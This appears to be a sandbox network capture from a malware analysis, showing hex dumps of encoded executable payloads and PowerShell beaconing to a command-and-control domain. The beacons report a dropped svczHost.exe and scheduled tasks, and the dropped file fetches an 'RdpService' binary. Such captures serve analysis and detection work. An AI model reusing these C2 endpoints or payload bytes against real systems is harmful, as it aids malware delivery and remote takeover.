                                                                                                                          2024-11-08 09:58:39 UTC305INData Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23
                                                                                                                          Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 01 01 01 01 01 01 01 01 71 99 01 01 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11 01 01 01 29 0d 01 01 05 01 01 01 01 01 01 01 01 01 01 01 01 01 01 21 01 01 61 2f 6c 60 6f 60 66 64 65 09 ab 3a 01 01 41 0d 01 01 ad 3a 01 01 2d 0d 01
                                                                                                                          Data Ascii: qa)Yi)UAqEQ1)A^/udyuy&)!a/l`o`fde:A:-
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bb d2 25 01 49 8c 04 da d6 4f 01 49 8c 0c cd d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 9c d2 25 01 49 8c 04 df d6 4f
                                                                                                                          Data Ascii: OI8tI%IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%IO
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 74 00 c2 49 8a d1 e8 33 ce 25 01 49 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 66 cf 25 01 49 8c 04 71 db 4f 01 49 8c 0c 60 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b cf 25 01 49 8c 04 92 db 4f 01 49 8c 0c 85 db
                                                                                                                          Data Ascii: tI3%I:OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8tIf%IqOI`OI8tIK%IOI
                                                                                                                          2024-11-08 09:58:39 UTC516INData Raw: 04 8e 57 90 01 49 8a 01 49 8c 0c 74 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c9 25 01 49 8c 04 0e 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c9 25 01 49
                                                                                                                          Data Ascii: WIItOI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,OI8tI%IWIIOI8tI%I
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 01 49 8a 01 49 8c 0c c4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c6 25 01 49 8c 04 96 54 90 01 49 8a 01 49 8c 0c ac cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 86 54 90 01 49 8a 01 49 8c 0c 9c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 76 54 90 01 49 8a 01 49 8c 0c 84 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 54 90 01 49 8a 01 49 8c 0c 6c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 54 90 01 49 8a 01 49 8c 0c 54 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 36 54 90 01 49 8a 01 49 8c 0c 3c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c7 25 01 49 8c 04 26 54 90 01 49 8a 01 49 8c 0c 24 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c7 25 01 49 8c 04 0e 54
                                                                                                                          Data Ascii: IIOI8tI%ITIIOI8tI%ITIIOI8tIg%IvTIIOI8tIG%IfTIIlOI8tI'%INTIITOI8tI%I6TII<OI8tI%I&TII$OI8tI%IT
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 01 49 8c 04 d6 53 90 01 49 8a 01 49 8c 0c 5c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 be 53 90 01 49 8a 01 49 8c 0c 44 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 a6 53 90 01 49 8a 01 49 8c 0c 2c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 8e 53 90 01 49 8a 01 49 8c 0c 14 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 76 53 90 01 49 8a 01 49 8c 0c fc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 5e 53 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 01 49 8c 04 46 53 90 01 49 8a 01 49 8c 0c cc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c0 25 01 49 8c 04 2e 53 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c0
                                                                                                                          Data Ascii: ISII\OI8tIG%ISIIDOI8tI'%ISII,OI8tI%ISIIOI8tI%IvSIIOI8tI%I^SIIOI8tI%IFSIIOI8tI%I.SIIOI8tIg
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 49 8a d1 e8 07 bc 25 01 49 8c 04 e6 4e 90 01 49 8a 01 49 8c 0c b4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 4e 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 4e 90 01 49 8a 01 49 8c 0c 8c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 4e 90 01 49 8a 01 49 8c 0c 7c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 ae 4e 90 01 49 8a 01 49 8c 0c 64 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 9e 4e 90 01 49 8a 01 49 8c 0c 4c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bd 25 01 49 8c 04 96 4e 90 01 49 8a 01 49 8c 0c 34 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bd 25 01 49 8c 04 7e 4e 90 01 49 8a 01 49 8c 0c 1c c7 4f 01 49 82 38 01 74 00
                                                                                                                          Data Ascii: I%INIIOI8tI%INIIOI8tI%INIIOI8tI%INII|OI8tI%INIIdOI8tIg%INIILOI8tIG%INII4OI8tI'%I~NIIOI8t
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 6c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 5c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 8e 4f 90 01 49 8a 01 49 8c 0c 4c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 7e 4f 90 01 49 8a 01 49 8c 0c 34 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c 1c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 6e 4f 90 01 49 8a 01 49 8c 0c 04 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b7 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c ec c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b7 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c d4 c3 4f
                                                                                                                          Data Ascii: I8tI%IOIIlOI8tI%IOII\OI8tIg%IOIILOI8tIG%I~OII4OI8tI'%IvOIIOI8tI%InOIIOI8tI%IVOIIOI8tI%I>OIIO
                                                                                                                          2024-11-08 09:58:39 UTC1369INData Raw: 49 8c 0c ec be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b3 25 01 49 8c 04 76 4a 90 01 49 8a 01 49 8c 0c e4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 5e 4a 90 01 49 8a 01 49 8c 0c cc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 46 4a 90 01 49 8a 01 49 8c 0c b4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 2e 4a 90 01 49 8a 01 49 8c 0c 9c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 1e 4a 90 01 49 8a 01 49 8c 0c 84 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 06 4a 90 01 49 8a 01 49 8c 0c 94 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b0 25 01 49 8c 04 ee 4b 90 01 49 8a 01 49 8c 0c 7c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b0 25 01 49 8c 04 fe 4b 90 01 49 8a
                                                                                                                          Data Ascii: IOI8tIG%IvJIIOI8tI'%I^JIIOI8tI%IFJIIOI8tI%I.JIIOI8tI%IJIIOI8tI%IJIIOI8tI%IKII|OI8tIg%IKI


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.11.3049749172.67.137.624434780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:51 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 200
                                                                                                                          2024-11-08 09:58:51 UTC200OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
                                                                                                                          2024-11-08 09:58:52 UTC947INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:52 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhVKe7wTWV7tn%2BKuE9c%2FiubXjrSjBQA70JY9TnRJjQbhEgIiidd0L45J6zBnPpb9ghxcUdMW%2FWDIH4JkemKhfbx6dr4i9RjuyYChVsmfNLAqPVTTDo72kuwk2USFRFe5%2Fd2Ll20bp03B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33527&sent=17232&recv=8380&lost=0&retrans=0&sent_bytes=24261181&recv_bytes=153064&delivery_rate=14205405&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b4fc68630cac-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102165&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1150&delivery_rate=37370&cwnd=252&unsent_bytes=0&cid=0bf12dc12e0d4312&ts=818&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.11.3049750172.67.137.624434780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:52 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 97
                                                                                                                          2024-11-08 09:58:52 UTC97OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
                                                                                                                          2024-11-08 09:58:53 UTC935INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:53 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WfQLleYFUSxxjI4XTy6aAq%2FeUAueOtRhRGOXPzsCNkHlbqDw36r3%2FNYJhbylVo7SbdW5E3c%2BUF703dBypt2cgxdlY39OH%2F5e3XIJPCPT1gp%2FU8QX8MabUWbMo3BEuHVerAPKco%2B5zw%2Fa"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8473&sent=4&recv=6&lost=0&retrans=0&sent_bytes=734&recv_bytes=1426&delivery_rate=24355&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b502fa338c47-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102630&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1046&delivery_rate=37315&cwnd=249&unsent_bytes=0&cid=a582b2cf7305817e&ts=827&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.11.3049751172.67.137.624434780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:56 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 64
                                                                                                                          2024-11-08 09:58:56 UTC64OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
                                                                                                                          2024-11-08 09:58:56 UTC936INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:56 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0WojSczSGKXpK0Fo6LiyaW0jieZi8un43fjO85%2BSNsdVKYrvisMEl7QC9IH8bMWOfsfCsvdonpdn%2Fz%2BS1Kehj1pA1BM6Q4Q49j6bo7wTnYqjkvLF62uOBErVM%2FmcviP69qYFavXq1iM"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=22569&sent=35&recv=42&lost=0&retrans=0&sent_bytes=5705&recv_bytes=29577&delivery_rate=2579505&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b5198a6b426a-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102214&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1013&delivery_rate=37348&cwnd=239&unsent_bytes=0&cid=e067535211205284&ts=828&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.11.3049754172.67.137.624435060C:\Windows\Temp\svczHost.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:59:40 UTC69OUTGET /StaticFile/RdpService/32 HTTP/1.1
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          2024-11-08 09:59:41 UTC1094INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:59:41 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 9427456
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                          hash: F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JX50QCX6A1ggyOdqwfh2wcLm8qjJmsJB8b5F4CGtjX8sgyLORRKXt7sZ%2FPMrRnZzbkPkd6lp9%2FanUEXAY9v7nBWAaKQ6UHXQSHatW5E6pcbMRkCGyhj1T35S2ZMoUGS%2F%2FmXDIzJMnE1C"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=26026&sent=28&recv=40&lost=0&retrans=0&sent_bytes=5532&recv_bytes=26688&delivery_rate=2552447&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b63029534414-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102212&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=707&delivery_rate=37392&cwnd=252&unsent_bytes=0&cid=b55b95b54caf1c81&ts=875&x=0"
                                                                                                                          2024-11-08 09:59:41 UTC275INData Raw: 6d 7a b0 20 23 20 20 20 24 20 20 20 df df 20 20 98 20 20 20 20 20 20 20 60 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 21 20 20 2e 3f 9a 2e 20 94 29 ed 01 98 21 6c ed 01 74 48 49 53 00 50 52 4f 47 52 41 4d 00 43 41 4e 4e 4f 54 00 42 45 00 52 55 4e 00 49 4e 00 64 6f 73 00 4d 4f 44 45 0e 2d 2d 2a 04 20 20 20 20 20 20 20 ce cd 16 00 8a ac 78 53 8a ac 78 53 8a ac 78 53 83 d4 eb 53 84 ac 78 53 fa 2d 79 52 9d ac 78 53 8a ac 79 53 0c ad 78 53 9a 28 7b 52 99 ac 78 53 9a 28 7c 52 b3 ac 78 53 c2 29 7d 52 89 ac 78 53 fa 2d 7c 52 88 ac 78 53 8a ac 78 53 8b ac 78 53 9a 28 7d 52 fc ac 78 53 c2 29 78 52 8b ac 78 53 c2 29 7a 52 8b ac 78 53 72 49 43 48 8a ac 78 53 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: mz # $ ` ! .?. )!ltHISPROGRAMCANNOTBERUNINdosMODE--* xSxSxSSxS-yRxSySxS({RxS(|RxS)}RxS-|RxSxSxS(}RxS)xRxS)zRxSrICHxS
                                                                                                                          2024-11-08 09:59:41 UTC1369INData Raw: 20 d0 20 02 20 2b 22 2e 09 20 1a 70 20 20 b0 61 20 20 3a 3c 20 b8 f1 2b 20 20 30 20 20 20 20 20 60 21 20 20 20 20 30 20 20 20 22 20 20 26 20 20 20 20 20 20 20 26 20 20 20 20 20 20 20 20 60 8e 20 20 24 20 20 20 20 20 20 23 20 40 a1 20 20 30 20 20 20 20 20 20 30 20 20 20 20 20 20 20 20 30 20 20 20 20 20 20 30 20 20 20 20 20 20 20 20 20 20 30 20 20 20 20 e6 85 20 28 22 20 20 28 e8 85 20 5c 21 20 20 20 30 8e 20 92 25 20 20 20 a0 88 20 e8 a6 25 20 20 20 20 20 20 20 20 20 20 00 8e 20 6c 34 20 20 b0 8c b9 20 3c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 a0 8e b9 20 08 20 20 20 70 8b b9 20 60 21 20 20 20 20 20 20 20 20 20 20 20 a0 4c 20 e0 2b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0e 54 45 58 54 20 20 20 38 67
                                                                                                                          Data Ascii: +". p a :< + 0 `! 0 " & & ` $ # @ 0 0 0 0 0 (" ( \! 0 % % l4 < p `! L + TEXT 8g
                                                                                                                          2024-11-08 09:59:41 UTC1369INData Raw: ae 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 e2 f4 08 20 68 ad 25 6b af 78 20 68 ad 2d 1c af 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 85 f4 08 20 68 ad 25 1e af 78 20 68 ad 2d 0f af 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 a8 f4 08 20 68 ad 25 11 af 78 20 68 ad 2d 02 af 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 4b f4 08 20 68 ad 25 04 af 78 20 68 ad 2d 35 af 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 6e f4 08 20 68 ad 25 37 af 78 20 68 ad 2d 28 af 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 11 f4 08 20 68 ad 25 2a af 78 20 68 ad 2d db ae 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 34 f4 08 20 68 ad 25 dd ae 78 20 68 ad 2d ce ae 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 d7 f3 08 20 68 ad 25 38 af 78 20 68 ad 2d 29 af 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 fa f3 08 20 68 ad 25 2b af
                                                                                                                          Data Ascii: x h U!h h%kx h-x h U!h h%x h-x h U!h h%x h-x h U!hK h%x h-5x h U!hn h%7x h-(x h U!h h%*x h-x h U!h4 h%x h-x h U!h h%8x h-)x h U!h h%+
